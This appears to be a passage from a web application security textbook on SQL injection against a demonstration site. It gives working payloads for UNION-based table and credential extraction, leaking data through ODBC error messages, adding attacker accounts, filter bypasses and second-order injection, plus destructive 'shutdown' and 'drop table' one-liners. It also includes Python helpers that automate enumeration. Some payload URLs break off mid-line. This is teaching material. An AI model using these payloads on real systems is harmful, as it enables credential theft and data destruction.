which MySQL handles certain types of inline comments. If a comment begins

with the exclamation point character followed by a database version string,

then the contents of the comment are interpreted as actual SQL, provided that

the version of the actual database is equal to or later than that string; other-

wise, the contents are ignored and treated as a comment. This facility can be

used by programmers in a similar way to preprocessor directives in C,

enabling them to write different code that will be processed conditionally

upon the database version being used. It can also be used by an attacker to fin-

gerprint the exact version of the database. For example, injecting the following

string will cause the WHERE clause of a SELECT statement to be false if the MySQL version in use is greater than or equal to 3.23.02:

/*!32302 and 1=0*/
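The number inside the comment is the version written as the major number followed by the two-digit minor and patch numbers, so 3.23.02 becomes 32302. A small helper can generate probes for a range of versions. The function name and signature below are hypothetical, chosen only for this sketch.

```python
def mysql_version_comment(major, minor, patch, sql):
    """Wrap sql in a MySQL conditional comment for the given minimum version."""
    # Minor and patch numbers are zero-padded to two digits each.
    version = f"{major}{minor:02d}{patch:02d}"
    return f"/*!{version} {sql}*/"

probe_3_23_02 = mysql_version_comment(3, 23, 2, "and 1=0")
probe_5_1_10 = mysql_version_comment(5, 1, 10, "and 1=0")
```

Injecting probes for successively later versions and noting where the application's behavior stops changing narrows down the version in use.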

Extracting Useful Data

In order to extract useful data from the database, you normally need to know

the names of the tables and columns containing the data you wish to access.

The main enterprise DBMSs contain a rich amount of database metadata that

you can query to discover the names of every table and column within the

database. The methodology for extracting useful data is the same in each case;

however, the details differ on different database platforms. We will examine

examples of extracting useful data from Oracle and MS-SQL databases.


An Oracle Hack

Consider an HR application that allows users to perform employee searches. A

typical search employs the following URL:

https://wahh-app.com/employees.asp?EmpNo=7521

This search returns the following results:

ID EMPLOYEE JOB

7521 WARD SALESMAN

We attempt to perform a UNION attack, and so need to determine the

required number of columns used in the query (which may differ from the

number of columns returned in the application’s responses). Injecting a query

that returns a single column results in an error message:

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL%20from%20dual--

[Oracle][ODBC][Ora]ORA-01789: query block has incorrect number of result columns

We continue adding additional NULLs to the injected query until no error

message is returned, and our query is executed:

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL,

NULL,NULL,NULL%20from%20dual--

ID EMPLOYEE JOB

7521 WARD SALESMAN

Note the blank line which has now been added to the table, containing the

NULL results from our injected query.
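The column-counting loop is easy to script. The following is a sketch only: it runs against an in-memory SQLite database standing in for the Oracle back end (so no `from dual` is needed), and the table layout and the helper name `count_union_columns` are assumptions made for illustration.

```python
import sqlite3


def count_union_columns(conn, base_query, max_columns=10):
    """Append UNION SELECT NULL,... with a growing column count until it runs."""
    for n in range(1, max_columns + 1):
        probe = base_query + " UNION SELECT " + ",".join(["NULL"] * n)
        try:
            conn.execute(probe).fetchall()
            return n  # no error: the column counts match
        except sqlite3.OperationalError:
            continue  # mismatched column count, try one more NULL
    return None


# Hypothetical four-column table playing the role of the employee data.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE emp (id INTEGER, name TEXT, job TEXT, mgr INTEGER)")
conn.execute("INSERT INTO emp VALUES (7521, 'WARD', 'SALESMAN', 7698)")

columns = count_union_columns(
    conn, "SELECT id, name, job, mgr FROM emp WHERE id = 7521"
)
print(columns)
```

Against a real target, the same loop would send each probe in the request parameter and treat the database error message as the failure signal.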

Having determined the number of columns, we now need to find a column

which has a string data type. Our first attempt is unsuccessful:

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20’a’,

NULL,NULL,NULL%20from%20dual--

[Oracle][ODBC][Ora]ORA-01790: expression must have same datatype as

corresponding expression

We target the second column, and this is successful, returning a row of data

containing the input we specified:

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL,

’a’,NULL,NULL%20from%20dual--

ID EMPLOYEE JOB

7521 WARD SALESMAN

We now have a means of extracting string data from the database. Our next

step is to find out the names of the database tables that may contain interest-

ing information. We can do this by querying the

user_objects table, which

displays details of user-defined tables and other items:

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL,

object_name,object_type,NULL%20from%20user_objects--

ID EMPLOYEE JOB

7521 WARD SALESMAN

BONUS TABLE

DEPT TABLE

EMP TABLE

EMP_GETDATA PROCEDURE

EMP_TABLE SYNONYM

GETEMP PROCEDURE

HIGHSCORE TABLE

PK_DEPT INDEX

PK_EMP INDEX

REMOTE.US.ORACLE.COM DATABASE LINK

REMOTE.WARGAMES DATABASE LINK

SALGRADE TABLE

SCANAPORT PROCEDURE

TEST123.WARGAMES DATABASE LINK

USERS TABLE

NOTE Here we have queried the user_objects table, which returns all the

objects owned by the web application’s database user. You can also query

all_objects, which will return all of the objects that are visible to that

user, even if not owned by it.

Many of these tables may contain sensitive data, including information

about employees that we cannot legitimately access given our privilege level.

An obvious point of initial attack is the table called

USERS, which may contain

credentials. We can discover the names of the columns within this table by

querying the

user_tab_columns table:

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL,

column_name,NULL,NULL%20from%20user_tab_columns%20where%20table_name%20%

3d%20’USERS’--

ID EMPLOYEE JOB

7521 WARD SALESMAN

PASSWORD

PRIVILEGE

SESSIONID

WORD

This output confirms that the USERS table does indeed contain sensitive

data, including passwords and session tokens. We now have everything we

need to extract any of this information. For example:

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL,

ID EMPLOYEE JOB

7521 WARD SALESMAN

admin 0wned

marcus marcus1

TIP In the attack just described, there are two columns available for retrieving

data, and the easiest exploit is to use both. If only one field were available, the

same attack could be carried out by concatenating multiple items of extracted

data into a single field. For example, the following URL would retrieve

usernames and passwords within just the Employee field, separated by a colon:

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL,

An MS-SQL Hack

Let’s take a look at a similar attack being performed against an MS-SQL data-

base. Consider a retailing application that allows users to search a product cat-

alog. A typical search uses the following URL:

https://wahh-app.com/products.asp?q=hub

This search returns the following results:

PRODUCT PRICE

Netgear Hub (4-port) £30

Netgear Hub (8-port) £40

First, we need to determine the required number of columns. Testing for a

single column results in an error message:

https://wahh-app.com/products.asp?q=hub’%20union%20select%20null--

[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL

statement containing a UNION operator must have an equal number of

expressions in their target lists.

We add a second NULL, and our query is executed, generating an additional

item in the results table:

https://wahh-app.com/products.asp?q=hub’%20union%20select%20null,null--

PRODUCT PRICE

Netgear Hub (4-port) £30

Netgear Hub (8-port) £40

We now verify that the first column in the query contains string data:

https://wahh-app.com/products.asp?q=hub’%20union%20select%20’a’,null--

PRODUCT PRICE

Netgear Hub (4-port) £30

Netgear Hub (8-port) £40

Our next step is to find out the names of the database tables that may con-

tain interesting information. We can do this by querying the

sysobjects table,

which contains details of all objects within the database. To retrieve only the

user-defined objects, we specify the type U:

https://wahh-app.com/products.asp?q=hub’%20union%20select%20name,

null%20from%20sysobjects%20where%20xtype%3d’U’--

PRODUCT PRICE

Netgear Hub (4-port) £30

Netgear Hub (8-port) £40

Dtproperties

Messages

pending_requests

Products

Searchorders

session_ids

Supercomputer

Users

users_session

users_session_passwords

Here again, the Users table is an obvious place to begin extracting data. To

discover the names of columns within the

users table, we can query the

syscolumns table:

https://wahh-app.com/products.asp?q=hub’%20UNION%20select%20b.name,null%

20from%20sysobjects%20a,syscolumns%20b%20where%20a.id=b.id%20and%

20a.name%3d’users’--

PRODUCT PRICE

Netgear Hub (4-port) £30

Netgear Hub (8-port) £40

Password

Privilege

Sessionid

Uid

Word

We now have everything we need to extract the information within the

Users table. For example:

https://wahh-app.com/products.asp?q=hub’%20UNION%20select%20login,

password%20from%20users--

PRODUCT PRICE

Netgear Hub (4-port) £30

Netgear Hub (8-port) £40

admin 0wned

dev n0ne

marcus marcus1

smith r00tr0x

testuser password

TIP As with the Oracle hack, the usernames and passwords could be retrieved

into a single column using the + concatenator (encoded as %2b):

https://wahh-app.com/products.asp?q=hub’%20UNION%20select%20login%2b’:

’%2bpassword,null%20from%20users--
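Encoding payloads by hand is error-prone, particularly for characters such as + that have a special meaning within a URL. A minimal sketch using Python's standard `urllib.parse` module follows; the helper name `encode_payload` is our own, and note that `quote` emits uppercase hex digits (%2B rather than %2b), which is equivalent.

```python
from urllib.parse import quote, unquote


def encode_payload(payload):
    """Percent-encode every reserved character, including + and spaces."""
    # safe="" stops quote() from leaving any reserved character unencoded.
    return quote(payload, safe="")


payload = "hub' UNION select login+':'+password,null from users--"
encoded = encode_payload(payload)
url = "https://wahh-app.com/products.asp?q=" + encoded
print(url)
```

If the + were left unencoded, the server would typically decode it as a space and the concatenation would be lost.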

Exploiting ODBC Error Messages (MS-SQL Only)

If you are attacking an MS-SQL database, there are alternative ways of

discovering the names of database tables and columns, and of extracting

useful data. MS-SQL generates extremely verbose error messages, which

can be exploited in various ways. The techniques described here were first dis-

covered by David Litchfield and Chris Anley in the course of a penetration

test, and are described in detail in several whitepapers by them.

Enumerating Table and Column Names

Recall the login function described earlier, which performs the following

SQL query, in which the username and password fields are vulnerable to SQL

injection:

SELECT * FROM users WHERE username = ‘marcus’ and password = ‘secret’

Although you can bypass the login by injecting into either of these fields, if

you wish to exploit the vulnerability to extract or modify sensitive data, then

you will need to know the names of the table and columns involved. Suppose

that the table being queried was originally created using the command

create table users( ID int, username varchar(255), password

varchar(255), privs int)

If ODBC error messages are being returned to your browser, then you can

trivially obtain all of this information about the table. The first step is to inject

the following string into one of the vulnerable fields:

‘ having 1=1--

This generates the following error message:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’

[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘users.ID’ is

invalid in the select list because it is not contained in an aggregate

function and there is no GROUP BY clause.

Embedded in this error message is the item users.ID, which in fact dis-

closes the name of the table being queried (

users) and the name of the first col-

umn being returned by the query (

ID). The next step is to insert the

enumerated column name into the attack string, which produces this:

‘ group by users.ID having 1=1--

Submitting this value generates the following error message:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’

[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘users.username’

is invalid in the select list because it is not contained in either an

aggregate function or the GROUP BY clause.

This message discloses the name of the second column being returned by

the query. You can continue inserting the name of each enumerated column

into the attack string, eventually arriving at the following attack string:

‘ group by users.ID, users.username, users.password, users.privs having

1=1--

Submitting this value does not result in any error message. This confirms

that you have now enumerated all of the columns being returned by the query,

and the order in which they appear.
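The enumeration just described is a simple loop: send a probe, read the column name out of the error, add it to the GROUP BY list, and repeat until no error comes back. The sketch below illustrates that loop under stated assumptions: `simulated_response` is a hypothetical stand-in for the vulnerable application, the error text uses straight quotes, and all function names are our own.

```python
import re

# Matches the MS-SQL message quoted above (straight quotes assumed).
COLUMN_IN_ERROR = re.compile(r"Column '([\w.]+)' is invalid in the select list")

# Hypothetical stand-in for the target: the columns of the users table.
TABLE_COLUMNS = ["users.ID", "users.username", "users.password", "users.privs"]


def build_probe(known_columns):
    """Return the next attack string given the columns found so far."""
    if not known_columns:
        return "' having 1=1--"
    return "' group by " + ", ".join(known_columns) + " having 1=1--"


def simulated_response(probe):
    """Mimic the error naming the first column missing from GROUP BY."""
    for column in TABLE_COLUMNS:
        if column not in probe:
            return (f"Column '{column}' is invalid in the select list because "
                    "it is not contained in either an aggregate function or "
                    "the GROUP BY clause.")
    return ""  # every column is grouped: no error message


def enumerate_columns(send):
    """Repeat the probe until the response no longer names a column."""
    known = []
    while True:
        match = COLUMN_IN_ERROR.search(send(build_probe(known)))
        if match is None:
            return known
        known.append(match.group(1))


columns = enumerate_columns(simulated_response)
print(columns)
```

In a real test, `send` would submit the probe in the vulnerable field and return the body of the response.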

The next step is to determine the data types of each column. Using the infor-

mation already obtained, you can supply the following input:

‘ union select sum(username) from users--

This input attempts to perform a second query and combine the results with

those of the original. It generates the following error message:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’

[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average

aggregate operation cannot take a varchar data type as an argument.

This error occurs because the database carried out the injected query before

attempting to combine the results with those of the original. The

SUM function

performs a numeric sum, and takes numeric type data as its input. Because the

username column is a string type, this causes an error, and the message dis-

closes that the username column is of the specific data type

varchar.

Submitting the same input with the

ID column produces a different error

message:

‘ union select sum(ID) from users--

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’

[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL

statement containing a UNION operator must have an equal number of

expressions in their target lists.

This error indicates that the SUM function was successful, and a problem

arose at the point where the database attempted to combine the single column

returned by the injected query with the four columns returned by the original

query. This effectively confirms that the

ID column is a numeric data type.

You can repeat this test on each of the fields of the query to confirm their

data types. Having done this, you now have sufficient information to extract

arbitrary information from the

users table, and to insert your own data into it.

For example, to add a new user account with arbitrary

ID and privs values,

you can submit the following as either of the vulnerable fields:

‘; insert into users values( 666, ‘attacker’, ‘foobar’, 0xffff )--

NOTE MS-SQL allows multiple separate SQL queries to be batched together,

optionally using a semicolon character as a separator. This enables you to carry

out an entirely separate statement, even using a different verb, via any SQL

injection vulnerability where the database is MS-SQL.

Extracting Arbitrary Data

One particularly useful ODBC error message occurs when the database

attempts to cast an item of string data to a numeric data type. In this situation,

the error message generated actually contains the value of the string item that

caused the problem. If error messages are being returned to the browser, this

behavior can be a gold mine to an attacker because it allows arbitrary string

data to be returned reliably.

It is possible to inject into the

WHERE clause of a SELECT statement in such a

way as to perform an arbitrary second query and trigger a failed string con-

version on the result. One way of doing this is as follows, which in this exam-

ple returns version information about the database and operating system:

‘ or 1 in (select @@version)--

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting

the nvarchar value ‘Microsoft SQL Server 2000 - 8.00.194 (Intel X86)

Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 2) ‘

to a column of data type int.

More interestingly, given the information already gathered, you could

retrieve the password of the admin user as follows:

‘ or 1 in (select password from users where username=’admin’)--

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting

the varchar value ‘0wned’ to a column of data type int.

TIP There are other ways of causing the database to attempt to convert a

string value to a numeric data type:

■■

You can attempt to “add” a string to a numeric value—for example,

1+@@version. Because this expression begins with a number, the

database interprets the + sign as addition rather than concatenation,

and so attempts to cast each subsequent term to a numeric type.

■■

You can use the function CAST to mandate any particular cast, for

example: SELECT CAST(@@version AS int).

Using Recursion

Suppose that you wish to extract all of the usernames and passwords in the

users table. Using the previous extraction technique, you can obtain only a

single item of string data at a time. One way to circumvent this restriction is to

craft a query that takes the previous result as its input and returns the next

result as its output. Issuing these queries recursively will enable you to cycle

through each of the items of data which you wish to extract.

For example, supplying the following input returns an error message con-

taining the username that appears alphabetically first in the

users table:

‘ or 1 in (select min(username) from users where username > ‘a’)--

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting

the varchar value ‘aaron’ to a column of data type int.

Having established the username aaron, you can insert this into the next

query as follows:

‘ or 1 in (select min(username) from users where username > ‘aaron’)--

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting

the varchar value ‘abbey’ to a column of data type int.

You can continue this process recursively until no further usernames are

returned. Having saved a list of these usernames, you can then use them to

retrieve the corresponding passwords directly, as in the earlier example.
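The recursive process can be sketched in a few lines. This example is illustrative only: an in-memory SQLite table with made-up usernames plays the part of the users table, `simulated_response` is a hypothetical stand-in that reproduces the shape of the MS-SQL conversion error (with straight quotes), and the function names are our own.

```python
import re
import sqlite3

# Captures the string disclosed by the conversion error.
VALUE_IN_ERROR = re.compile(
    r"converting the n?varchar value '(.*?)' to a column of data type int"
)

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT)")
conn.executemany(
    "INSERT INTO users VALUES (?)",
    [("marcus",), ("aaron",), ("admin",), ("abbey",)],
)


def simulated_response(last_seen):
    """Stand-in for injecting: ' or 1 in (select min(username) ... > last_seen)--"""
    row = conn.execute(
        "SELECT min(username) FROM users WHERE username > ?", (last_seen,)
    ).fetchone()
    if row[0] is None:
        return "Login failed"  # nothing left to disclose, so no error
    return (f"Syntax error converting the varchar value '{row[0]}' "
            "to a column of data type int.")


def enumerate_usernames(send, start="a"):
    """Feed each captured value back in until no further value is returned."""
    found, last = [], start
    while True:
        match = VALUE_IN_ERROR.search(send(last))
        if match is None:
            return found
        last = match.group(1)
        found.append(last)


usernames = enumerate_usernames(simulated_response)
print(usernames)
```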

TIP You can use the Recursive Grep payload type in Burp Intruder to

automate this attack. To do this, you need to configure the Extract Grep

function to use the following trigger to capture the string data returned in the

error message:

varchar value ‘

You then need to set a single payload position to insert each captured string at

the appropriate point in your injected query, and set the initial payload to a.

The captured values will be displayed in a column of the results table, and you

should let the attack continue until no further items are returned.

Bypassing Filters

In some situations, an application that is vulnerable to SQL injection may

implement various input filters that prevent you from exploiting the flaw

without restrictions. For example, the application may remove or sanitize cer-

tain characters, or may block common SQL keywords. Filters of this kind are

often vulnerable to bypasses, and there are numerous tricks that you should

try in this situation.

Avoiding Blocked Characters

If the application removes or encodes some characters that are often used in

SQL injection attacks, you may still be able to perform an attack without these:

■■

The single quotation mark is not required if you are injecting into a

numeric data field.

■■

If the comment symbol is blocked, you can often craft your injected

data such that it does not break the syntax of the surrounding query,

even without using this. For example, instead of injecting

‘ or 1=1--

you can inject

‘ or ‘a’=’a

■■

When attempting to inject batched queries into an MS-SQL database,

you do not need to use the semicolon separator. Provided you fix up

the syntax of all queries in the batch, the query parser will interpret

them correctly regardless of whether or not you include a semicolon.

Circumventing Simple Validation

Some input validation routines employ a simple blacklist, and either block or

remove any supplied data which appears on this list. In this instance, you

should try the standard attacks looking for common defects in validation and

canonicalization mechanisms. For example, if the

SELECT keyword is being

blocked or removed, you can try the following bypasses:

SeLeCt

SELSELECTECT

%53%45%4c%45%43%54

%2553%2545%254c%2545%2543%2554
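To see why these variations work, it helps to model the kind of naive filter they defeat. The following sketch is an assumption about how such a filter might be written, not a description of any particular product: one function strips the blocked keyword in a single pass, another performs a case-sensitive match, and the last lines show what happens when input is URL-decoded a second time after validation.

```python
from urllib.parse import unquote


def strip_once(value, blocked="SELECT"):
    """Naive filter: remove the keyword in a single, non-recursive pass."""
    return value.replace(blocked, "")


def is_allowed(value, blocked="SELECT"):
    """Naive filter: reject input containing the exact, uppercase keyword."""
    return blocked not in value


# Stripping the inner keyword leaves the outer halves joined together.
after_strip = strip_once("SELSELECTECT")

# A case-sensitive comparison does not notice mixed case.
mixed_case_allowed = is_allowed("SeLeCt")

# Double encoding: a filter applied after one decode sees only %53%45...,
# and a later second decode restores the keyword.
double_encoded = "%2553%2545%254c%2545%2543%2554"
first_pass = unquote(double_encoded)
second_pass = unquote(first_pass)

print(after_strip, mixed_case_allowed, first_pass, second_pass)
```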

Using SQL Comments

Inline comments can be inserted into SQL statements in the same way as for

C++, by embedding them between the symbols

/* and */. If the application

blocks or strips spaces from your input, you can use comments to simulate

whitespace within your injected data. For example:

SELECT/*foo*/username,password/*foo*/FROM/*foo*/users

In MySQL, comments can even be inserted within keywords themselves,

which provides another means of bypassing some input validation filters

while preserving the syntax of the actual query. For example:

SEL/*foo*/ECT username,password FR/*foo*/OM users

Manipulating Blocked Strings

If the application blocks certain strings that you wish to place as data items

within an injected query, then the required string can be constructed dynami-

cally using various string manipulation functions. For example, if the expres-

sion

admin is being blocked, then you can build this in the following ways:

■■

Oracle: ‘adm’||’in’

■■

MS-SQL: ‘adm’+’in’

■■

MySQL: concat(‘adm’,’in’)

Most databases contain many custom functions for string manipulation that

can be used to construct blocked strings in arbitrarily complex ways, in order

to circumvent different input validation filters. For example, Oracle contains

the functions

CHR, REVERSE, TRANSLATE, REPLACE, and SUBSTR. A function like

CHR can be used to introduce a literal string in cases where single quotation

marks are being blocked. For example, the following query effectively smug-

gles in the string

admin:

SELECT password from users where username = chr(97) || chr(100) ||

chr(109) || chr(105) || chr(110)
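Writing these expressions by hand quickly becomes tedious for longer strings. A minimal sketch of a generator follows; the function name `oracle_chr_expression` is our own.

```python
def oracle_chr_expression(text):
    """Express a string as concatenated Oracle CHR() calls, with no quotes."""
    return " || ".join(f"chr({ord(character)})" for character in text)


expression = oracle_chr_expression("admin")
query = "SELECT password from users where username = " + expression
print(query)
```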

Using Dynamic Execution

Some databases provide a means of executing SQL statements dynamically, by

passing a string representation of a particular statement to the relevant func-

tion. For example, in MS-SQL you can use the following:

exec(‘select * from users’)

This enables you to employ any of the string manipulation techniques

described previously anywhere within the statement to bypass filters designed

to block certain expressions. For example:

exec(‘sel’ + ‘ect * from ‘ + ‘users’)

You can also create a string from hex-encoded numeric data, and then pass

this string to the

exec function, enabling you to bypass many kinds of input fil-

ter, including the blocking of single quotation marks, for example:

declare @q varchar(8000)

select @q = 0x73656c656374202a2066726f6d207573657273

exec(@q)
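The hex literal is simply the ASCII bytes of the statement written in hexadecimal. As a sketch (the helper names are our own), it can be produced and wrapped in the batch shown above like this:

```python
def mssql_hex_literal(statement):
    """Encode a statement as an MS-SQL hex literal, e.g. 0x73656c..."""
    return "0x" + statement.encode("ascii").hex()


def exec_batch(statement):
    """Wrap the hex literal in the declare/select/exec batch shown above."""
    return (
        "declare @q varchar(8000) "
        f"select @q = {mssql_hex_literal(statement)} "
        "exec(@q)"
    )


literal = mssql_hex_literal("select * from users")
batch = exec_batch("select * from users")
print(batch)
```

The resulting batch contains no single quotation marks and none of the original keywords from the encoded statement.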

In Oracle, you can use EXECUTE IMMEDIATE to execute a query that is repre-

sented as a string. For example:

declare

l_cnt varchar2(20);

begin

execute immediate ‘sel’||’ect * fr’||’om users’

into l_cnt;

dbms_output.put_line(l_cnt);

end;

Exploiting Defective Filters

It is very common for applications to seek to defend themselves against SQL

injection by escaping any single quotation marks that appear within string-

based user input (and rejecting any that appear within numeric input). As you

have seen, two single quotation marks together are an escape sequence that

represents one literal single quote, which the database will interpret as data

within a quoted string rather than the closing string terminator. Many devel-

opers reason, therefore, that by doubling up any single quotation marks

within user-supplied input, they will prevent any SQL injection attacks from

occurring.

In addition to doubling up quotation marks, some applications perform

other operations in an effort to sanitize potentially malicious input. In this sit-

uation, it may be possible to exploit the ordering of these steps to bypass the

filter, as described in Chapter 2.

Recall the vulnerable login example. Suppose that the application doubles

up any single quotation marks contained in user input, and also then imposes

a length limit on the data, truncating it to 20 characters. Supplying the

username

admin’--

now results in the following query, which fails to bypass the login:

SELECT * FROM users WHERE username = ‘admin’‘--‘ and password = ‘’

However, if you submit the following username (containing 19 a’s and one

single quotation mark):

aaaaaaaaaaaaaaaaaaa’

then the application first doubles up the single quotation mark, and then trun-

cates the string to 20 characters, returning your input to its original value. This

results in a database error, because you have injected an additional single quo-

tation mark into the query without fixing up the surrounding syntax. If you

now also supply the password

[space]or 1=1--

the application performs the following query, which succeeds in bypassing the login:

SELECT * FROM users WHERE username = ‘aaaaaaaaaaaaaaaaaaa’‘ and password

= ‘ or 1=1--‘

The doubled-up quotation mark at the end of the string of a’s is interpreted

as an escaped quotation mark and, therefore, as part of the query data. This

string effectively continues as far as the next single quotation mark, which in

the original query marked the start of the user-supplied password value. The

actual username understood by the database will, thus, be the literal string

data shown here:

aaaaaaaaaaaaaaaaaaa’ and password =

Hence, whatever comes next will be interpreted as part of the query itself

and can be crafted to interfere with the query logic.
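The interaction between the two sanitization steps can be reproduced locally. The sketch below makes several assumptions: the filter is modeled by our own `defective_sanitize` function, the login query is built by simple string concatenation, and an in-memory SQLite database stands in for the real back end.

```python
import sqlite3


def defective_sanitize(value, limit=20):
    """Double up quotes, then truncate: this ordering is the flaw."""
    return value.replace("'", "''")[:limit]


def build_login_query(username, password):
    """Build the login query by concatenation, as the application does."""
    return (
        "SELECT * FROM users WHERE username = '" + defective_sanitize(username)
        + "' and password = '" + defective_sanitize(password) + "'"
    )


conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', '0wned')")

# The straightforward attack is neutralized by the doubled quote.
blocked = conn.execute(build_login_query("admin'--", "")).fetchall()

# 19 a's plus a quote: doubling makes 21 characters, truncation removes
# the second quote, and the password field then carries the payload.
query = build_login_query("a" * 19 + "'", " or 1=1--")
bypass = conn.execute(query).fetchall()

print(query)
print(bypass)
```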

TIP You can test for this type of vulnerability without knowing exactly what

length limit is being imposed by submitting in turn two long strings of the

following form:

‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘ etc.

a’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘ etc.

and determining whether an error occurs. Any truncation of escaped input will

either occur after an even number or an odd number of characters. Whichever

possibility is the case, one of the preceding strings will result in an odd number

of single quotation marks being inserted into the query, resulting in invalid

syntax.

Second-Order SQL Injection

A particularly interesting type of filter bypass arises in connection with second-

order SQL injection. As described earlier, it is very common for applications to

seek to defend themselves against SQL injection by escaping any single quota-

tion marks that appear within string-based user input (and rejecting any that

appear within numeric input). Even when this approach is not vulnerable in

the ways already described, it can sometimes be bypassed.

In the original book search example, this approach appears to be effective.

When the user enters the search term

O’Reilly, the application makes the fol-

lowing query:

SELECT author,title,year FROM books WHERE publisher = ‘O’‘Reilly’

Here, the single quotation mark supplied by the user has been converted

into two single quotation marks, and so the item passed to the database has the

same literal significance as the original expression entered by the user.

One problem with the doubling-up approach arises in more complex situa-

tions where the same item of data passes through several SQL queries, being

written to the database and then read back more than once. This is one exam-

ple of the shortcomings of simple input validation as opposed to boundary vali-

dation, as described in Chapter 2.

Recall the application that allowed users to self-register and contained a

SQL injection flaw in an

INSERT statement. Suppose that developers attempt to

fix the vulnerability by doubling up any single quotation marks which appear

within user data. Attempting to register the username

foo’ results in the fol-

lowing query, which causes no problems for the database:

INSERT INTO users (username, password, ID, privs) VALUES (‘foo’‘’,

‘secret’, 2248, 1)

So far, so good. However, suppose that the application also implements a pass-

word change function. This function is only reachable by authenticated users, but

for extra protection, the application requires users to submit their old password.

It then verifies that this is correct by retrieving the user’s current password from

the database and comparing the two strings. To do this, it first retrieves the user’s

username from the database and then constructs the following query:

SELECT password FROM users WHERE username = ‘foo’‘

Because the username stored in the database is the literal string foo’, this is

the value that the database returns when this value is queried — the doubled-

up escape sequence is only used at the point where strings are passed into the

database. Therefore, when the application reuses this string and embeds it into

a second query, a SQL injection flaw arises and the user’s original bad input is

embedded directly into the query. When the user attempts to change the pass-

word, the application returns the following message, which reveals the flaw:

Unclosed quotation mark before the character string ‘foo

To exploit this vulnerability, an attacker can simply register a username con-

taining his crafted input, and then attempt to change his password. For exam-

ple, if the following username is registered:

‘ or 1 in (select password from users where username=’admin’)--

then the registration step itself will be handled securely. When the attacker

tries to change his password, his injected query will be executed, resulting in

the following message, which discloses the admin user’s password:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting

the varchar value ‘fme69’ to a column of data type int.

The attacker has successfully bypassed the input validation that was

designed to block SQL injection attacks, and now has a means of executing

arbitrary queries within the database and retrieving the results.
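The essence of the flaw is that data is escaped on the way into the database but trusted on the way out. The following sketch reproduces this with an in-memory SQLite database standing in for the real back end; the `escape` helper and the two-column table are assumptions made for illustration, and the exact error text differs from the MS-SQL message shown above.

```python
import sqlite3


def escape(value):
    """The developers' fix: double up any single quotation marks."""
    return value.replace("'", "''")


conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")

# Registration: the input is escaped, so the INSERT is handled safely.
conn.execute(
    "INSERT INTO users (username, password) VALUES ('"
    + escape("foo'") + "', 'secret')"
)

# The database stores and returns the literal value, with a single quote.
stored = conn.execute("SELECT username FROM users").fetchone()[0]

# Password change: the stored value is reused without being escaped again.
error = None
try:
    conn.execute("SELECT password FROM users WHERE username = '" + stored + "'")
except sqlite3.OperationalError as exc:
    error = str(exc)

print(repr(stored), error)
```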

Advanced Exploitation

In all of the attacks described so far, there has been a ready means of retrieving

any useful data that was extracted from the database — for example, by per-

forming a

UNION attack or returning data in an error message. As awareness of

SQL injection threats has evolved, this kind of situation has become gradually

less common. It is increasingly the case that the SQL injection flaws that you

encounter will be in situations where retrieving the results of your injected

queries is not straightforward. We shall look at several ways in which this

problem can arise and how it can be dealt with.

NOTE Application owners should be aware that not every attacker is

interested in stealing sensitive data. Some may be more destructive — for

example, by supplying just 12 characters of input, an attacker could turn off an

MS-SQL database with the shutdown command:

‘ shutdown--

An attacker could also inject malicious commands to drop individual tables

with commands such as these:

‘ drop table users--

‘ drop table accounts--

‘ drop table customers--

Retrieving Data as Numbers

It is fairly common to find that no string fields within an application are vul-

nerable to SQL injection, because input containing single quotation marks is

being properly handled. However, vulnerabilities may still exist within

numeric data fields, where user input is not encapsulated within single quotes.

Often in these situations, the only means of retrieving the results of your

injected queries is via a numeric response from the application.

In this situation, your challenge is to process the results of your injected

queries in such a way that meaningful data can be retrieved in numeric form.

There are two key functions that can be used here:

■■

ASCII, which returns the ASCII code for the input character.

■■

SUBSTRING (or SUBSTR in Oracle), which returns a substring of its input.

These functions can be used together to extract a single character from a

string, in numeric form. For example:

SUBSTRING(‘Admin’,1,1) returns A

ASCII(‘A’) returns 65

Therefore:

ASCII(SUBSTR(‘Admin’,1,1)) returns 65

Using these two functions, you can systematically cut up a string of useful

data into its individual characters, and return each of these separately, in

numeric form. In a scripted attack, this technique can be used to quickly

retrieve and reconstruct a large amount of string-based data, one byte at a

time.
